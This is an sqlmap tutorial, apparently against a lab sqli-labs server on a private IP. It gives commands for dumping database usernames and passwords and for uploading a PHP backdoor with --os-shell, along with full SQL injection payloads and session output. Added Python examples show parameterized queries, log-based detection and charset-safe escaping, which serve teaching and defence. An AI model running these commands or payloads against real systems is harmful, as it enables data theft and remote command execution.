SQLmap basic usage


    Other injection tools
    明小子
    穿山甲 (Pangolin)
    啊D
     
     
     
    Testing once an injection point has been identified
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1
     
    Current database
    sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
     
    Other databases
    --dbs
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --dbs
     
    Tables in a database
    -D security --tables
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
     
    Columns in a table
    -D security -T users --columns
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
     
    Dumping the contents of selected columns
    -D security -T users -C username,password --dump
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
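    The hole all of these commands rely on is the Less-1 pattern: the id parameter is spliced into a quoted SQL string. The Python example below is added here and is not part of the original post. It rebuilds that pattern against an in-memory SQLite table with constructed rows, runs the boolean-based blind payload sqlmap reports for this target further down (1' AND 4954=4954 AND 'HBhg'='HBhg) against both the string-concatenation query and a parameterized one, and shows that only the former behaves as a true/false oracle. The table contents, the false-branch twin payload and the helper name is_boolean_injectable are my own.

```python
import sqlite3

# The boolean-based blind payload sqlmap reported for Less-1 (true branch), and
# a constructed false-branch twin with the same shape.
PAYLOAD_TRUE = "1' AND 4954=4954 AND 'HBhg'='HBhg"
PAYLOAD_FALSE = "1' AND 4954=4955 AND 'HBhg'='HBhg"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the security.users table; rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "<hash-placeholder>"), (2, "bob", "<hash-placeholder>")],
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the id value is spliced into a quoted literal, the shape
    sqlmap classifies as a 'WHERE or HAVING clause' injection."""
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened: the value is bound as a parameter, so the quote and the
    trailing AND clauses are data, never SQL."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def is_boolean_injectable(conn: sqlite3.Connection, lookup) -> bool:
    """The oracle behind boolean-based blind injection: a true/false payload
    pair that produces different responses. True means the lookup is injectable."""
    return lookup(conn, PAYLOAD_TRUE) != lookup(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", lookup_concat), ("param", lookup_param)):
        print(name, "true:", fn(db, PAYLOAD_TRUE), "false:", fn(db, PAYLOAD_FALSE),
              "injectable:", is_boolean_injectable(db, fn))
```

    With the concatenated query the true payload returns alice and the false one returns nothing, which is exactly the difference sqlmap measures to extract data bit by bit; with the bound parameter both payloads return nothing and the plain value "1" still works, so the fix costs no functionality.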
     
    Dropping a backdoor (--os-shell)
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
     
    Writable web root to supply when sqlmap asks for a directory: C:/phpstudy_pro/WWW
     
    sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell
     
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.4.7#stable}
    |_ -| . [,]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org
     
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
     
    [*] starting @ 22:51:21 /2020-12-28/
     
    [22:51:21] [INFO] resuming back-end DBMS 'mysql'
    [22:51:21] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg
     
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ
     
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa
     
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -
    ---
    [22:51:22] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.5
    [22:51:22] [INFO] going to use a web backdoor for command prompt
    [22:51:22] [INFO] fingerprinting the back-end DBMS operating system
    [22:51:23] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
    [22:51:28] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: C:\phpstudy_pro\WWW
    [22:51:40] [WARNING] unable to automatically parse any web server path
    [22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method
    [22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php
    [22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php
    [22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    os-shell> ipconfig
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:
    ---
     
    Windows IP 配置
     
     
    以太网适配器 本地连接:
     
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab
    IPv4 地址 . . . . . . . . . . . . : 192.168.2.12
    子网掩码 . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . : 192.168.2.2
     
    隧道适配器 isatap.localdomain:
     
    媒体状态 . . . . . . . . . . . . : 媒体已断开
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    ---
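    Seen from the server side, every payload type in the session above leaves a recognisable trace in the web server's access log, and so do the stager and backdoor files the os-shell step wrote (tmpucxne.php, tmpbuonw.php). The Python script below is an added example, not part of the original post: it parses constructed Apache combined-format log lines that carry the boolean-, time- and UNION-based payloads and the file names from this session, URL-encoded as they would arrive, and flags each line by rule. The client addresses, timestamps and byte counts are made up; the rule names and the analyze/hits_by_ip helpers are my own.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines. The query strings carry,
# URL-encoded, the payloads sqlmap reported in the session above; the last two
# requests hit the stager/backdoor file names from the os-shell run. Client
# address, timestamps and byte counts are made up for this example.
SAMPLE_LOG = """
192.168.2.10 - - [28/Dec/2020:22:51:21 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 754 "-" "Mozilla/5.0"
192.168.2.10 - - [28/Dec/2020:22:51:21 +0800] "GET /sqli/Less-1/?id=1%27%20AND%204954%3D4954%20AND%20%27HBhg%27%3D%27HBhg HTTP/1.1" 200 754 "-" "sqlmap/1.4.7#stable (http://sqlmap.org)"
192.168.2.10 - - [28/Dec/2020:22:51:22 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%205466%20FROM%20%28SELECT%28SLEEP%285%29%29%29fXNK%29%20AND%20%27oDCa%27%3D%27oDCa HTTP/1.1" 200 754 "-" "Mozilla/5.0"
192.168.2.10 - - [28/Dec/2020:22:51:22 +0800] "GET /sqli/Less-1/?id=-8233%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716a717a71%2C0x46%2C0x716b6b6a71%29%2CNULL--%20- HTTP/1.1" 200 912 "-" "Mozilla/5.0"
192.168.2.10 - - [28/Dec/2020:22:51:41 +0800] "GET /tmpucxne.php HTTP/1.1" 200 1 "-" "Mozilla/5.0"
192.168.2.10 - - [28/Dec/2020:22:51:42 +0800] "POST /tmpbuonw.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.2.13 - - [28/Dec/2020:22:52:00 +0800] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 760 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"\s*$'
)

# Rules applied to the URL-decoded request path. Names are my own.
PATH_RULES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # sqlmap brackets extracted data with a five-character marker of the form
    # q...q (hex 0x71....71), as in 0x716a717a71 / 0x716b6b6a71 above.
    "hex-marker": re.compile(r"0x71[0-9a-f]{6}71\b", re.I),
    # The stager and backdoor were written as tmp + five lowercase letters + .php.
    "stager-access": re.compile(r"^/tmp[a-z]{5}\.php$"),
}


@dataclass
class Alert:
    ip: str
    ts: str
    rule: str
    path: str


def analyze(log_text: str) -> list:
    """Return one Alert per (line, rule) match; the sqlmap User-Agent is a rule too."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        path = unquote(m["path"])
        if m["ua"].startswith("sqlmap/"):
            alerts.append(Alert(m["ip"], m["ts"], "sqlmap-ua", path))
        for name, rx in PATH_RULES.items():
            if rx.search(path):
                alerts.append(Alert(m["ip"], m["ts"], name, path))
    return alerts


def hits_by_ip(alerts: list) -> dict:
    """Alert count per client address, the first thing to pivot on in triage."""
    counts = {}
    for a in alerts:
        counts[a.ip] = counts.get(a.ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for a in found:
        print(a.ip, a.ts, a.rule, a.path)
    print(hits_by_ip(found))
```

    The User-Agent rule catches only a default sqlmap run (the string is trivially changed), so the path rules carry the real weight; the stager-access rule is the one worth alerting on loudest, since a request for a fresh tmp*.php under the web root means the injection has already been turned into file write.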
     
     
    Wide-byte injection
    Use the unmagicquotes tamper script to perform a wide-byte bypass
    sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
     
    The other bypass (tamper) scripts live in sqlmap's /tamper/ directory,
    for example on Kali: /usr/share/sqlmap/tamper/
     
    Look up what each script does on Baidu yourself, for example:
    https://www.cnblogs.com/mark0/p/12349551.html
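    The wide-byte bypass works because byte-wise escaping such as PHP's addslashes()/magic_quotes inserts a 0x5c backslash without knowing the connection charset; under GBK a preceding lead byte swallows that backslash into a two-byte character and the quote after it closes the literal. The Python example below is added here and is not part of the original post: it reproduces the byte-wise escaping, checks how the escaped bytes read under GBK versus UTF-8, and contrasts it with charset-aware escaping that decodes first and therefore rejects a lone lead byte (the behaviour mysqli_real_escape_string has once mysqli_set_charset() has been called). The sample input and the helper names are my own.

```python
def escape_bytewise(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of addslashes(): prepend a backslash to
    ' " \\ and NUL without any knowledge of the connection charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)


def escape_charset_aware(raw: bytes, charset: str) -> bytes:
    """Decode first (a lone lead byte raises UnicodeDecodeError), escape in the
    character domain, then re-encode. Bound parameters remove the need for this."""
    text = raw.decode(charset)
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


def quote_survives(escaped: bytes, charset: str) -> bool:
    """Read the escaped bytes the way a server using `charset` would and report
    whether an unescaped single quote remains, i.e. whether the literal can be
    closed. This is the property the wide-byte bypass depends on."""
    text = escaped.decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash escapes the character that follows it
            continue
        if text[i] == "'":
            return True
        i += 1
    return False


# Constructed input: a lone GBK lead byte (0xdf) followed by a single quote.
ATTACKER_INPUT = b"1\xdf'"

if __name__ == "__main__":
    weak = escape_bytewise(ATTACKER_INPUT)
    print("byte-wise escaped:", weak)
    print("quote survives under gbk:  ", quote_survives(weak, "gbk"))
    print("quote survives under utf-8:", quote_survives(weak, "utf-8"))
    try:
        escape_charset_aware(ATTACKER_INPUT, "gbk")
    except UnicodeDecodeError as err:
        print("charset-aware escaping rejected the input:", err)
```

    The same escaped bytes are safe under UTF-8 and unsafe under GBK, which is why the defence is to fix the charset handling (set the client charset through the driver so escaping matches the connection, or use prepared statements) rather than to blacklist the tamper script's byte sequences.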
     
     
    Capturing a POST request and marking the injection point
    1. Capture the POST request with Burp and export it to a file
    2. sqlmap -r [file path/file name]
    3. The remaining options are the same as above

    If anything here is wrong, suggestions and corrections are welcome in the comments.
  Original article: https://www.cnblogs.com/Tzsblog/p/14234441.html